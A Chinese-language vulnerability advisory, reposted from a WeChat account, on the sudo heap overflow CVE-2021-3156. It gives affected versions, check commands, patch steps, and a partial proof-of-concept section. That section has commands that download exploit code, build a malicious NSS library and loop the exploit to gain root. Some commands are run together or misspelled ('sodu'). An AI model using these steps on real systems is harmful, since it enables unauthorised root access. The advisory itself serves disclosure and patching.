【漏洞预警】sudo堆溢出漏洞通告(CVE-2021-3156)含部分POC

  • A+
所属分类:安全漏洞

一、漏洞描述

1月26日,Sudo发布安全通告,修复了一个类Unix操作系统在命令参数中转义反斜杠时存在基于堆的缓冲区溢出漏洞。当sudo通过-s或-i命令行选项在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用-s或 -i标志运行sudoedit时,实际上并未进行转义,从而可能导致缓冲区溢出。只要存在sudoers文件(通常是 /etc/sudoers),攻击者就可以使用本地普通用户利用sudo获得系统root权限。目前漏洞细节已公开,请受影响的用户尽快采取措施进行防护。

二、影响范围

受影响版本

Sudo 1.8.2 – 1.8.31p2Sudo 1.9.0 – 1.9.5p1

不受影响版本

sudo =>1.9.5p2

自查方式

一、

sodu -V

【漏洞预警】sudo堆溢出漏洞通告(CVE-2021-3156)含部分POC

二、

1、以非root用户身份登录系统,运行命令“sudoedit -s /”

2、如果系统容易受到攻击,它将以“sudoedit:”开头的错误作为响应。如果对系统进行了修补,它将以“usage:”开头的错误作为响应

Ubuntu 漏洞修复

1、下载安全版本 sudo

wget https://www.sudo.ws/dist/sudo-1.9.5p2.tar.gz

2、解压

tar zxvf sudo-1.9.5p2.tar.gz

3、编译

cd sudo-1.9.5p2./configuremake sudo make install

Rad Hat临时修复方法

https://access.redhat.com/security/vulnerabilities/RHSB-2021-002

漏洞 POC(部分公开)

https://github.com/reverse-ex/CVE-2021-3156

使用方法:

cd /tmpwget https://raw.githubusercontent.com/reverse-ex/CVE-2021-3156/main/1.cmkdir libnss_Xgcc -fpic -shared -nostdlib -o libnss_X/X.so.2 la.cfor i in {1..128000}; do echo -n "try number $i "; ./exploit; done

Exploite.c 还未公开

【漏洞预警】sudo堆溢出漏洞通告(CVE-2021-3156)含部分POC

【漏洞预警】sudo堆溢出漏洞通告(CVE-2021-3156)含部分POC

漏洞技术细节:

https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit


本文始发于微信公众号(漏洞推送):【漏洞预警】sudo堆溢出漏洞通告(CVE-2021-3156)含部分POC

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: